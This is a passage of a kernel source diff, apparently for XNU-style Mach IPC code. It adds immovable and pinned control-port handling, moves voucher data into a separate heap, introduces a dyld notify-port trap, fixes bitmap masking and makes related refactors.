                                    MACH_PORT_TYPE_SEND_RECEIVE);
+                               assert(port->ip_pinned == 0);
 
                                ip_reference(port);
                        } else {
@@ -2281,9 +2305,13 @@ ipc_right_copyin(
                }
 
                if (!allow_imm_send && port->ip_immovable_send) {
-                       ip_unlock(port);
-                       mach_port_guard_exception(name, 0, 0, kGUARD_EXC_IMMOVABLE);
-                       return KERN_INVALID_CAPABILITY;
+                       if (!ip_is_control(port) || immovable_control_port_enabled) {
+                               ip_unlock(port);
+                               if (!soft_fail_imm_send) {
+                                       mach_port_guard_exception_immovable(name, port, MPG_FLAGS_NONE);
+                               }
+                               return KERN_INVALID_CAPABILITY;
+                       }
                }
 
                assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_SEND_ONCE);
@@ -2392,7 +2420,7 @@ ipc_right_copyin_two_move_sends(
        port = ip_object_to_port(entry->ie_object);
        assert(port != IP_NULL);
 
-       if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) {
+       if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) {
                *releasep = port;
                goto invalid_right;
        }
@@ -2520,7 +2548,7 @@ ipc_right_copyin_two(
                ipc_object_t object_two;
 
                kr = ipc_right_copyin(space, name, entry,
-                   msgt_one, IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND,
+                   msgt_one, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND,
                    objectp, sorightp, releasep,
                    &assertcnt, 0, NULL);
                assert(assertcnt == 0);
@@ -2539,7 +2567,7 @@ ipc_right_copyin_two(
                 *      receive right.
                 */
                kr = ipc_right_copyin(space, name, entry,
-                   msgt_two, IPC_RIGHT_COPYIN_FLAGS_NONE,
+                   msgt_two, IPC_OBJECT_COPYIN_FLAGS_NONE,
                    &object_two, sorightp, releasep,
                    &assertcnt, 0, NULL);
                assert(assertcnt == 0);
@@ -2579,7 +2607,7 @@ ipc_right_copyin_two(
                }
 
                kr = ipc_right_copyin(space, name, entry,
-                   msgt_name, IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND,
+                   msgt_name, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND,
                    objectp, sorightp, releasep,
                    &assertcnt, 0, NULL);
                assert(assertcnt == 0);
@@ -2626,6 +2654,7 @@ ipc_right_copyout(
        mach_port_name_t        name,
        ipc_entry_t             entry,
        mach_msg_type_name_t    msgt_name,
+       ipc_object_copyout_flags_t flags,
        mach_port_context_t     *context,
        mach_msg_guard_flags_t  *guard_flags,
        ipc_object_t            object)
@@ -2642,6 +2671,12 @@ ipc_right_copyout(
 
        port = ip_object_to_port(object);
 
+       if (pinned_control_port_enabled && (flags & IPC_OBJECT_COPYOUT_FLAGS_PINNED)) {
+               assert(!port->ip_pinned);
+               assert(port->ip_immovable_send);
+               port->ip_pinned = 1;
+       }
+
        switch (msgt_name) {
        case MACH_MSG_TYPE_PORT_SEND_ONCE:
 
index a3049efc70a38bc7297ed376152d10ba14d7af42..fcaefbad6f3193e44f8191d551d59b16ad38e418 100644 (file)
 #define ipc_right_lookup_read           ipc_right_lookup_write
 #define ipc_right_lookup_two_read       ipc_right_lookup_two_write
 
-typedef uint32_t ipc_right_copyin_flags_t;
-
-#define IPC_RIGHT_COPYIN_FLAGS_NONE                   0x0
-#define IPC_RIGHT_COPYIN_FLAGS_DEADOK                 0x1
-#define IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND   0x2
-#define IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE   0x4   /* allow copyin of a send once right to a dead port with no dead name requests */
-
 /* Find an entry in a space, given the name */
 extern kern_return_t ipc_right_lookup_write(
        ipc_space_t             space,
@@ -96,7 +89,7 @@ extern kern_return_t ipc_right_lookup_two_write(
        ipc_entry_t             *entryp2);
 
 /* Translate (space, object) -> (name, entry) */
-extern boolean_t ipc_right_reverse(
+extern bool          ipc_right_reverse(
        ipc_space_t             space,
        ipc_object_t            object,
        mach_port_name_t        *namep,
@@ -123,9 +116,7 @@ extern ipc_port_t ipc_right_request_cancel(
                 ipc_right_request_cancel((space), (port), (name), (entry)))
 
 /* Check if an entry is being used */
-extern boolean_t ipc_right_inuse(
-       ipc_space_t             space,
-       mach_port_name_t        name,
+extern bool      ipc_right_inuse(
        ipc_entry_t             entry);
 
 /* Check if the port has died */
@@ -134,7 +125,7 @@ extern boolean_t ipc_right_check(
        ipc_port_t               port,
        mach_port_name_t         name,
        ipc_entry_t              entry,
-       ipc_right_copyin_flags_t flags);
+       ipc_object_copyin_flags_t flags);
 
 /* Clean up an entry in a dead space */
 extern void ipc_right_terminate(
@@ -193,7 +184,7 @@ extern kern_return_t ipc_right_copyin(
        mach_port_name_t          name,
        ipc_entry_t               entry,
        mach_msg_type_name_t      msgt_name,
-       ipc_right_copyin_flags_t  flags,
+       ipc_object_copyin_flags_t  flags,
        ipc_object_t              *objectp,
        ipc_port_t                *sorightp,
        ipc_port_t                *releasep,
@@ -218,6 +209,7 @@ extern kern_return_t ipc_right_copyout(
        mach_port_name_t        name,
        ipc_entry_t             entry,
        mach_msg_type_name_t    msgt_name,
+       ipc_object_copyout_flags_t flags,
        mach_port_context_t     *context,
        mach_msg_guard_flags_t  *guard_flags,
        ipc_object_t            object);
index f5fde0daec3c64dcf6f1a20d811001caa7662939..ce2eb466428ea98952eddc0213038fbbc66a7c04 100644 (file)
@@ -63,10 +63,16 @@ typedef struct ipc_kmsg *ipc_kmsg_t;
 typedef uint8_t sync_qos_count_t;
 
 typedef uint64_t ipc_label_t;
-#define IPC_LABEL_NONE     ((ipc_label_t)0x0)
-#define IPC_LABEL_DEXT     ((ipc_label_t)0x1)
-#define IPC_LABEL_PLATFORM ((ipc_label_t)0x2)
-#define IPC_LABEL_SPECIAL  ((ipc_label_t)0x3)
+#define IPC_LABEL_NONE          ((ipc_label_t)0x0000)
+#define IPC_LABEL_DEXT          ((ipc_label_t)0x0001)
+#define IPC_LABEL_PLATFORM      ((ipc_label_t)0x0002)
+#define IPC_LABEL_SPECIAL       ((ipc_label_t)0x0003)
+#define IPC_LABEL_SPACE_MASK    ((ipc_label_t)0x00ff)
+
+#define IPC_LABEL_SUBST_TASK    ((ipc_label_t)0x0100)
+#define IPC_LABEL_SUBST_THREAD  ((ipc_label_t)0x0200)
+#define IPC_LABEL_SUBST_ONCE    ((ipc_label_t)0x0300)
+#define IPC_LABEL_SUBST_MASK    ((ipc_label_t)0xff00)
 
 typedef struct ipc_kobject_label *ipc_kobject_label_t;
 
index 4a753c7371144b27d52231d70d50cdbd7fda6b2b..f8673f3252f7a4f55457d069e9e5fb64d1517885 100644 (file)
@@ -364,7 +364,7 @@ unsafe_convert_port_to_voucher(
                 * keeps the voucher bound to the port (and active).
                 */
                if (ip_kotype(port) == IKOT_VOUCHER) {
-                       return (uintptr_t)port->ip_kobject;
+                       return (uintptr_t)ipc_kobject_get(port);
                }
        }
        return (uintptr_t)IV_NULL;
@@ -492,7 +492,7 @@ convert_voucher_to_port(ipc_voucher_t voucher)
         * if this is the first send right
         */
        if (!ipc_kobject_make_send_lazy_alloc_port(&voucher->iv_port,
-           (ipc_kobject_t)voucher, IKOT_VOUCHER, false, 0)) {
+           (ipc_kobject_t)voucher, IKOT_VOUCHER, IPC_KOBJECT_ALLOC_NONE, false, 0)) {
                ipc_voucher_release(voucher);
        }
        return voucher->iv_port;
@@ -706,7 +706,7 @@ convert_voucher_attr_control_to_port(ipc_voucher_attr_control_t control)
         * ipc_voucher_attr_control_notify if this is the first send right
         */
        if (!ipc_kobject_make_send_lazy_alloc_port(&control->ivac_port,
-           (ipc_kobject_t)control, IKOT_VOUCHER_ATTR_CONTROL, false, 0)) {
+           (ipc_kobject_t)control, IKOT_VOUCHER_ATTR_CONTROL, IPC_KOBJECT_ALLOC_NONE, false, 0)) {
                ivac_release(control);
        }
        return control->ivac_port;
@@ -2876,7 +2876,7 @@ struct user_data_value_element {
        iv_index_t                              e_sum;
        iv_index_t                              e_hash;
        queue_chain_t                           e_hash_link;
-       uint8_t                                 e_data[];
+       uint8_t                                *e_data;
 };
 
 typedef struct user_data_value_element *user_data_element_t;
@@ -2967,6 +2967,13 @@ ipc_voucher_attr_control_t test_control;
 #define USER_DATA_ASSERT_KEY(key) assert(MACH_VOUCHER_ATTR_KEY_TEST == (key))
 #endif
 
+static void
+user_data_value_element_free(user_data_element_t elem)
+{
+       kheap_free(KHEAP_DATA_BUFFERS, elem->e_data, elem->e_size);
+       kfree(elem, sizeof(struct user_data_value_element));
+}
+
 /*
  *     Routine:        user_data_release_value
  *     Purpose:
@@ -2996,7 +3003,7 @@ user_data_release_value(
        if (sync == elem->e_made) {
                queue_remove(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link);
                user_data_unlock();
-               kfree(elem, sizeof(*elem) + elem->e_size);
+               user_data_value_element_free(elem);
                return KERN_SUCCESS;
        }
        assert(sync < elem->e_made);
@@ -3076,7 +3083,7 @@ retry:
                        user_data_unlock();
 
                        if (NULL != alloc) {
-                               kfree(alloc, sizeof(*alloc) + content_size);
+                               user_data_value_element_free(alloc);
                        }
 
                        return elem;
@@ -3086,11 +3093,12 @@ retry:
        if (NULL == alloc) {
                user_data_unlock();
 
-               alloc = (user_data_element_t)kalloc(sizeof(*alloc) + content_size);
+               alloc = kalloc(sizeof(struct user_data_value_element));
                alloc->e_made = 1;
                alloc->e_size = content_size;
                alloc->e_sum = sum;
                alloc->e_hash = hash;
+               alloc->e_data = kheap_alloc(KHEAP_DATA_BUFFERS, content_size, Z_WAITOK | Z_NOFAIL);
                memcpy(alloc->e_data, content, content_size);
                goto retry;
        }
index 903fc3bde881f12ba1e56b0e48b95a3e827f42f5..6ad851ac5ed8f3dfb2a62232a606b8b838db9bbc 100644 (file)
@@ -203,7 +203,7 @@ mach_port_space_info(
        }
 
 #if !(DEVELOPMENT || DEBUG) && CONFIG_MACF
-       const boolean_t dbg_ok = (mac_task_check_expose_task(kernel_task) == 0);
+       const boolean_t dbg_ok = (mac_task_check_expose_task(kernel_task, TASK_FLAVOR_CONTROL) == 0);
 #else
        const boolean_t dbg_ok = TRUE;
 #endif
index 66263ba91e7917ca461aa375b312237545fbc0af..49eb98146805f52fd7be4b00213ef2f559716aea 100644 (file)
@@ -37,6 +37,7 @@
 #include <kern/ipc_tt.h>
 #include <kern/kalloc.h>
 #include <vm/vm_protos.h>
+#include <kdp/kdp_dyld.h>
 
 kern_return_t
 mach_port_get_attributes(
@@ -46,6 +47,8 @@ mach_port_get_attributes(
        mach_port_info_t        info,
        mach_msg_type_number_t  *count);
 
+extern lck_mtx_t g_dyldinfo_mtx;
+
 int
 _kernelrpc_mach_vm_allocate_trap(struct _kernelrpc_mach_vm_allocate_trap_args *args)
 {
@@ -281,7 +284,7 @@ _kernelrpc_mach_port_insert_right_trap(struct _kernelrpc_mach_port_insert_right_
        }
 
        rv = ipc_object_copyin(task->itk_space, args->poly, args->polyPoly,
-           (ipc_object_t *)&port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND);
+           (ipc_object_t *)&port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND);
        if (rv != KERN_SUCCESS) {
                goto done;
        }
@@ -302,7 +305,7 @@ done:
 int
 _kernelrpc_mach_port_get_attributes_trap(struct _kernelrpc_mach_port_get_attributes_args *args)
 {
-       task_inspect_t task = port_name_to_task_read_no_eval(args->target);
+       task_read_t task = port_name_to_task_read_no_eval(args->target);
        int rv = MACH_SEND_INVALID_DEST;
        mach_msg_type_number_t count;
 
@@ -538,10 +541,8 @@ _kernelrpc_mach_port_request_notification_trap(
                // thread-argument-passing and its value should not be garbage
                current_thread()->ith_knote = ITH_KNOTE_NULL;
                rv = ipc_object_copyout(task->itk_space, ip_to_object(previous),
-                   MACH_MSG_TYPE_PORT_SEND_ONCE, NULL, NULL, &previous_name);
+                   MACH_MSG_TYPE_PORT_SEND_ONCE, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL, &previous_name);
                if (rv != KERN_SUCCESS) {
-                       ipc_object_destroy(ip_to_object(previous),
-                           MACH_MSG_TYPE_PORT_SEND_ONCE);
                        goto done;
                }
        }
@@ -665,3 +666,187 @@ done:
        ipc_voucher_release(voucher);
        return kr;
 }
+
+/*
+ * Mach Trap: task_dyld_process_info_notify_get_trap
+ *
+ * Return an array of active dyld notifier port names for current_task(). User
+ * is responsible for allocating the memory for the mach port names array
+ * and deallocating the port names inside the array returned.
+ *
+ * Does not consume any reference.
+ *
+ * Args:
+ *     names_addr: Address for mach port names array.          (In param only)
+ *     names_count_addr: Number of active dyld notifier ports. (In-Out param)
+ *         In:  Number of slots available for copyout in caller
+ *         Out: Actual number of ports copied out
+ *
+ * Returns:
+ *
+ *     KERN_SUCCESS: A valid namesCnt is returned. (Can be zero)
+ *     KERN_INVALID_ARGUMENT: Arguments are invalid.
+ *     KERN_MEMORY_ERROR: Memory copyio operations failed.
+ *     KERN_NO_SPACE: User allocated memory for port names copyout is insufficient.
+ *
+ *     Other error code see task_info().
+ */
+kern_return_t
+task_dyld_process_info_notify_get_trap(struct task_dyld_process_info_notify_get_trap_args *args)
+{
+       struct task_dyld_info dyld_info;
+       mach_msg_type_number_t info_count = TASK_DYLD_INFO_COUNT;
+       mach_port_name_t copyout_names[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT];
+       ipc_port_t copyout_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT];
+       ipc_port_t release_ports[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT];
+       uint32_t copyout_count = 0, release_count = 0, active_count = 0;
+       mach_vm_address_t ports_addr; /* a user space address */
+       mach_port_name_t new_name;
+       natural_t user_names_count = 0;
+       ipc_port_t sright;
+       kern_return_t kr;
+       ipc_port_t *portp;
+       ipc_entry_t entry;
+
+       if ((mach_port_name_array_t)args->names_addr == NULL || (natural_t *)args->names_count_addr == NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
+
+       kr = copyin((vm_map_address_t)args->names_count_addr, &user_names_count, sizeof(natural_t));
+       if (kr) {
+               return KERN_MEMORY_FAILURE;
+       }
+
+       if (user_names_count == 0) {
+               return KERN_NO_SPACE;
+       }
+
+       kr = task_info(current_task(), TASK_DYLD_INFO, (task_info_t)&dyld_info, &info_count);
+       if (kr) {
+               return kr;
+       }
+
+       if (dyld_info.all_image_info_format == TASK_DYLD_ALL_IMAGE_INFO_32) {
+               ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr +
+                   offsetof(struct user32_dyld_all_image_infos, notifyMachPorts));
+       } else {
+               ports_addr = (mach_vm_address_t)(dyld_info.all_image_info_addr +
+                   offsetof(struct user64_dyld_all_image_infos, notifyMachPorts));
+       }
+
+       lck_mtx_lock(&g_dyldinfo_mtx);
+       itk_lock(current_task());
+
+       if (current_task()->itk_dyld_notify == NULL) {
+               itk_unlock(current_task());
+               (void)copyoutmap_atomic32(current_task()->map, MACH_PORT_NULL, (vm_map_address_t)ports_addr); /* reset magic */
+               lck_mtx_unlock(&g_dyldinfo_mtx);
+
+               kr = copyout(&copyout_count, (vm_map_address_t)args->names_count_addr, sizeof(natural_t));
+               return kr ? KERN_MEMORY_ERROR : KERN_SUCCESS;
+       }
+
+       for (int slot = 0; slot < DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT; slot++) {
+               portp = &current_task()->itk_dyld_notify[slot];
+               if (*portp == IPC_PORT_NULL) {
+                       continue;
+               } else {
+                       sright = ipc_port_copy_send(*portp);
+                       if (IP_VALID(sright)) {
+                               copyout_ports[active_count++] = sright; /* donates */
+                               sright = IPC_PORT_NULL;
+                       } else {
+                               release_ports[release_count++] = *portp; /* donates */
+                               *portp = IPC_PORT_NULL;
+                       }
+               }
+       }
+
+       task_dyld_process_info_update_helper(current_task(), active_count,
+           (vm_map_address_t)ports_addr, release_ports, release_count);
+       /* itk_lock, g_dyldinfo_mtx are unlocked upon return */
+
+       for (int i = 0; i < active_count; i++) {
+               sright = copyout_ports[i]; /* donates */
+               copyout_ports[i] = IPC_PORT_NULL;
+
+               assert(IP_VALID(sright));
+               ip_reference(sright);
+               /*
+                * Below we consume each send right in copyout_ports, and if copyout_send
+                * succeeds, replace it with a port ref; otherwise release the port ref.
+                *
+                * We can reuse copyout_ports array for this purpose since
+                * copyout_count <= active_count.
+                */
+               new_name = ipc_port_copyout_send(sright, current_space()); /* consumes */
+               if (MACH_PORT_VALID(new_name)) {
+                       copyout_names[copyout_count] = new_name;
+                       copyout_ports[copyout_count] = sright; /* now holds port ref */
+                       copyout_count++;
+               } else {
+                       ip_release(sright);
+               }
+       }
+
+       assert(copyout_count <= active_count);
+
+       if (user_names_count < copyout_count) {
+               kr = KERN_NO_SPACE;
+               goto copyout_failed;
+       }
+
+       /* copyout to caller's local copy */
+       kr = copyout(copyout_names, (vm_map_address_t)args->names_addr,
+           copyout_count * sizeof(mach_port_name_t));
+       if (kr) {
+               kr = KERN_MEMORY_ERROR;
+               goto copyout_failed;
+       }
+
+       kr = copyout(&copyout_count, (vm_map_address_t)args->names_count_addr, sizeof(natural_t));
+       if (kr) {
+               kr = KERN_MEMORY_ERROR;
+               goto copyout_failed;
+       }
+
+       /* now, release port refs on copyout_ports */
+       for (int i = 0; i < copyout_count; i++) {
+               sright = copyout_ports[i];
+               assert(IP_VALID(sright));
+               ip_release(sright);
+       }
+
+       return KERN_SUCCESS;
+
+
+copyout_failed:
+       /*
+        * No locks are held beyond this point.
+        *
+        * Release port refs on copyout_ports, and deallocate ports that we copied out
+        * earlier.
+        */
+       for (int i = 0; i < copyout_count; i++) {
+               sright = copyout_ports[i];
+               assert(IP_VALID(sright));
+
+               if (ipc_right_lookup_write(current_space(), copyout_names[i], &entry)) {
+                       /* userspace has deallocated the name we copyout */
+                       ip_release(sright);
+                       continue;
+               }
+               /* space is locked and active */
+               if (entry->ie_object == ip_to_object(sright) ||
+                   IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_DEAD_NAME) {
+                       (void)ipc_right_dealloc(current_space(), copyout_names[i], entry); /* unlocks space */
+               } else {
+                       is_write_unlock(current_space());
+               }
+
+               /* space is unlocked */
+               ip_release(sright);
+       }
+
+       return kr;
+}
index 0ed0d93321cbd2011bb6a0ccd0a645c3a29ff1d1..f073413655768969c23d517ad3af183dae44ce87 100644 (file)
@@ -79,7 +79,6 @@
 
 #include <kern/kern_types.h>
 #include <kern/assert.h>
-#include <kern/counters.h>
 #include <kern/cpu_number.h>
 #include <kern/ipc_kobject.h>
 #include <kern/ipc_mig.h>
@@ -795,7 +794,7 @@ msg_receive_error(
        }
 }
 
-static mach_msg_fetch_filter_policy_cbfunc_t mach_msg_fetch_filter_policy_callback = NULL;
+static SECURITY_READ_ONLY_LATE(mach_msg_fetch_filter_policy_cbfunc_t) mach_msg_fetch_filter_policy_callback = NULL;
 
 kern_return_t
 mach_msg_filter_register_callback(
index 2c0a4d854b4b4dd86fc18cf41c422c67931132e4..deaa574ac292130e273ab55f319b879945624d8e 100644 (file)
@@ -80,7 +80,6 @@
 #include <mach/vm_prot.h>
 #include <mach/vm_map.h>
 #include <kern/task.h>
-#include <kern/counters.h>
 #include <kern/thread.h>
 #include <kern/exc_guard.h>
 #include <mach/mach_port_server.h>
@@ -1844,7 +1843,8 @@ mach_port_extract_right(
        }
 
        kr = ipc_object_copyin(space, name, msgt_name, (ipc_object_t *) poly, 0, NULL,
-           IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND);
+           (space == current_space() && msgt_name == MACH_MSG_TYPE_COPY_SEND) ?
+           IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND : IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND);
 
        if (kr == KERN_SUCCESS) {
                *polyPoly = ipc_object_copyin_type(msgt_name);
@@ -2473,6 +2473,30 @@ mach_port_guard_exception(
        thread_guard_violation(t, code, subcode, fatal);
 }
 
+/*
+ * Temporary wrapper for immovable mach port guard exception.
+ *
+ * Condition: !(ip_is_control(port) && !immovable_control_port_enabled)
+ */
+void
+mach_port_guard_exception_immovable(
+       mach_port_name_t        name,
+       mach_port_t             port,
+       uint64_t                portguard)
+{
+       if (ip_is_control(port) && immovable_control_port_enabled) {
+               mach_port_guard_exception(name, 0, portguard,
+                   ipc_control_port_options & IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD ?
+                   kGUARD_EXC_IMMOVABLE : kGUARD_EXC_IMMOVABLE_NON_FATAL);
+       } else if (!ip_is_control(port)) {
+               /* always fatal exception for non-control port violation */
+               mach_port_guard_exception(name, 0, portguard, kGUARD_EXC_IMMOVABLE);
+       } else {
+               /* ip_is_control(port) && !immovable_control_port_enabled */
+               panic("mach_port_guard_exception_immovable: condition does not hold.");
+       }
+}
+
 
 /*
  *     Routine:        mach_port_guard_ast
index 5b24a9885f2cd9f38c1517f6b98f56ee9bdeb8f2..852a850b580fbc529d10e9edb43939ffb1385008 100644 (file)
@@ -92,6 +92,11 @@ extern void mach_port_guard_exception(
        uint64_t      inguard,
        uint64_t      portguard,
        unsigned      reason);
+
+extern void mach_port_guard_exception_immovable(
+       mach_port_name_t        name,
+       mach_port_t             port,
+       uint64_t                portguard);
 __END_DECLS
 
 #endif  /* _IPC_PORT_H_ */
index 289c5d4d03da0c40e8a013762495db046d11b317..ecfaf24dc4bf38454da829f78e66585a20c7851f 100644 (file)
@@ -35,6 +35,9 @@
 #define DYLD_ALL_IMAGE_INFOS_ADDRESS_MINIMUM_VERSION    9
 #define DYLD_ALL_IMAGE_INFOS_TIMESTAMP_MINIMUM_VERSION  15
 
+#define DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT 8
+#define DYLD_PROCESS_INFO_NOTIFY_MAGIC 0x49414E46
+
 /* Re-use dyld format for kext load addresses */
 #if __LP64__
 typedef struct user64_dyld_uuid_info kernel_uuid_info;
@@ -90,7 +93,9 @@ struct user32_dyld_all_image_infos {
        /* the following field is only in version 15 (Mac OS X 10.12, iOS 10.0) and later */
        user32_addr_t   sharedCacheBaseAddress;
        uint64_t        timestamp;
-       user32_addr_t   reserved[14];
+       user32_addr_t   dyldpath;
+       mach_port_name_t notifyMachPorts[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT];
+       user32_addr_t   reserved[5];
        /* the following fields are only in version 16 (macOS 10.13, iOS 12.0) and later */
        user32_addr_t compact_dyld_image_info_addr;
        user32_size_t compact_dyld_image_info_size;
@@ -128,7 +133,9 @@ struct user64_dyld_all_image_infos {
        /* the following field is only in version 15 (macOS 10.12, iOS 10.0) and later */
        user64_addr_t   sharedCacheBaseAddress;
        uint64_t        timestamp;
-       user64_addr_t   reserved[14];
+       user64_addr_t   dyldPath;
+       mach_port_name_t notifyMachPorts[DYLD_MAX_PROCESS_INFO_NOTIFY_COUNT];
+       user64_addr_t   reserved[9];
        /* the following fields are only in version 16 (macOS 10.13, iOS 12.0) and later */
        user64_addr_t compact_dyld_image_info_addr;
        user64_size_t compact_dyld_image_info_size;
index 42b7559005bce11f51f7e7fd78d51e65d057746e..2ef4d343dfb53e6fc1974f30e57803f9b30d4b27 100644 (file)
@@ -623,21 +623,30 @@ machine_trace_thread64(thread_t thread,
                pc = get_saved_state_pc(state);
                sp = get_saved_state_sp(state);
        } else {
-               /* kstackptr may not always be there, so recompute it */
-               struct arm_kernel_saved_state * state = &thread_get_kernel_state(thread)->machine.ss;
-               stacklimit = VM_MAX_KERNEL_ADDRESS;
-               stacklimit_bottom = VM_MIN_KERNEL_ADDRESS;
-               bt_vm_map = kernel_map;
+               struct arm_saved_state *state = thread->machine.kpcb;
+               if (state != NULL) {
+                       if (fp == 0) {
+                               fp = state->ss_64.fp;
+                       }
 
-               /* Get the frame pointer */
-               if (fp == 0) {
-                       fp = state->fp;
+                       prevlr = state->ss_64.lr;
+                       pc = state->ss_64.pc;
+                       sp = state->ss_64.sp;
+               } else {
+                       /* kstackptr may not always be there, so recompute it */
+                       arm_kernel_saved_state_t *kstate = &thread_get_kernel_state(thread)->machine.ss;
+
+                       if (fp == 0) {
+                               fp = kstate->fp;
+                       }
+                       prevlr = kstate->lr;
+                       pc = kstate->pc;
+                       sp = kstate->sp;
                }
 
-               /* Fill in the current link register */
-               prevlr = state->lr;
-               pc = state->pc;
-               sp = state->sp;
+               stacklimit = VM_MAX_KERNEL_ADDRESS;
+               stacklimit_bottom = VM_MIN_KERNEL_ADDRESS;
+               bt_vm_map = kernel_map;
        }
 
        if (!user_p && !prevlr && !fp && !sp && !pc) {
index 7d2ddfc5e0aa0b385b36ecd7f927500cf515e857..42da7337bf340fed1aad2bcfc5845877b973d96a 100644 (file)
@@ -39,10 +39,12 @@ EXPORT_FILES = \
        circle_queue.h \
        clock.h \
        coalition.h \
+       counter.h  \
        cpu_number.h \
        cpu_data.h \
        energy_perf.h \
        extmod_statistics.h \
+       hv_io_notifier.h \
        hv_support.h \
        hv_support_kext.h \
        ipc_mig.h \
@@ -56,6 +58,7 @@ EXPORT_FILES = \
        locks.h \
        lock_group.h \
        host.h \
+       hvg_hypercall.h \
        mach_param.h \
        macro_help.h \
        mpqueue.h \
index d0e3415297d97e78c30557f286a1ab8fbf6e9137..0c38b3a26d1fe088cc5c721946c6ec849f8d2ed6 100644 (file)
@@ -55,7 +55,7 @@
  */
 
 #include <kern/ast.h>
-#include <kern/counters.h>
+#include <kern/counter.h>
 #include <kern/cpu_quiesce.h>
 #include <kern/misc_protos.h>
 #include <kern/queue.h>
@@ -132,8 +132,6 @@ ast_taken_kernel(void)
 
        assert(urgent_reason & AST_PREEMPT);
 
-       counter(c_ast_taken_block++);
-
        thread_block_reason(THREAD_CONTINUE_NULL, NULL, urgent_reason);
 
        assert(ml_get_interrupts_enabled() == FALSE);
@@ -311,7 +309,6 @@ ast_taken_user(void)
 #endif
 
                if (preemption_reasons & AST_PREEMPT) {
-                       counter(c_ast_taken_block++);
                        /* switching to a continuation implicitly re-enables interrupts */
                        thread_block_reason(thread_preempted, NULL, preemption_reasons);
                        /* NOTREACHED */
index 991941f57cea87e5cf45d4bb9fec4785d595a615..62b671d9ed87e15af4e81a73f806aade64e0279f 100644 (file)
@@ -59,7 +59,7 @@ audit_session_mksend(struct auditinfo_addr *aia_p, ipc_port_t *sessionport)
 {
        audit_session_aiaref(aia_p);
        if (!ipc_kobject_make_send_lazy_alloc_port(sessionport,
-           (ipc_kobject_t)aia_p, IKOT_AU_SESSIONPORT, false, 0)) {
+           (ipc_kobject_t)aia_p, IKOT_AU_SESSIONPORT, IPC_KOBJECT_ALLOC_NONE, false, 0)) {
                audit_session_aiaunref(aia_p);
        }
 
index 89012eb5a2be5eaa1fa2dc681e360ba005428015..045ed96217f18ec6ee1d41285d87e1dccab03930 100644 (file)
@@ -312,9 +312,17 @@ bitmap_first(bitmap_t *map, uint nbits)
 inline static void
 bitmap_not(bitmap_t *out, const bitmap_t *in, uint nbits)
 {
-       for (uint i = 0; i <= bitmap_index(nbits - 1); i++) {
+       uint i;
+
+       for (i = 0; i < bitmap_index(nbits - 1); i++) {
                out[i] = ~in[i];
        }
+
+       uint nbits_complete = i * 64;
+
+       if (nbits > nbits_complete) {
+               out[i] = ~in[i] & mask(nbits - nbits_complete);
+       }
 }
 
 inline static void
@@ -328,9 +336,17 @@ bitmap_and(bitmap_t *out, const bitmap_t *in1, const bitmap_t *in2, uint nbits)
 inline static void
 bitmap_and_not(bitmap_t *out, const bitmap_t *in1, const bitmap_t *in2, uint nbits)
 {
-       for (uint i = 0; i <= bitmap_index(nbits - 1); i++) {
+       uint i;
+
+       for (i = 0; i < bitmap_index(nbits - 1); i++) {
                out[i] = in1[i] & ~in2[i];
        }
+
+       uint nbits_complete = i * 64;
+
+       if (nbits > nbits_complete) {
+               out[i] = (in1[i] & ~in2[i]) & mask(nbits - nbits_complete);
+       }
 }
 
 inline static bool
index cb46e621be064755251e908b4758e1f8d15244da..aafd7130138d36d8a64be3e307bc566068ea4447 100644 (file)
@@ -324,7 +324,7 @@ get_task_map_reference(task_t t)
                return VM_MAP_NULL;
        }
        m = t->map;
-       vm_map_reference_swap(m);
+       vm_map_reference(m);
        task_unlock(t);
        return m;
 }
@@ -768,6 +768,12 @@ get_vmmap_size(
 {
        return vm_map_adjusted_size(map);
 }
+int
+get_task_page_size(
+       task_t task)
+{
+       return vm_map_page_size(task->map);
+}
 
 #if CONFIG_COREDUMP
 
@@ -1016,7 +1022,7 @@ fill_taskprocinfo(task_t task, struct proc_taskinfo_internal * ptinfo)
        ptinfo->pti_threads_system = tinfo.threads_system;
        ptinfo->pti_threads_user = tinfo.threads_user;
 
-       ptinfo->pti_faults = task->faults;
+       ptinfo->pti_faults = (int32_t) MIN(counter_load(&task->faults), INT32_MAX);
        ptinfo->pti_pageins = task->pageins;
        ptinfo->pti_cow_faults = task->cow_faults;
        ptinfo->pti_messages_sent = task->messages_sent;
index e77ca4e68fb07a21094e9246519fe01d82cc32ee..af789e0b2f7fba8739d5d664d00b435a55cce6fc 100644 (file)
@@ -89,7 +89,7 @@ int merge_adaptive_coalitions;
 LCK_GRP_DECLARE(coalitions_lck_grp, "coalition");
 
 /* coalitions_list_lock protects coalition_count, coalitions queue, next_coalition_id. */
-static LCK_MTX_DECLARE(coalitions_list_lock, &coalitions_lck_grp);
+static LCK_RW_DECLARE(coalitions_list_lock, &coalitions_lck_grp);
 static uint64_t coalition_count;
 static uint64_t coalition_next_id = 1;
 static queue_head_t coalitions_q;
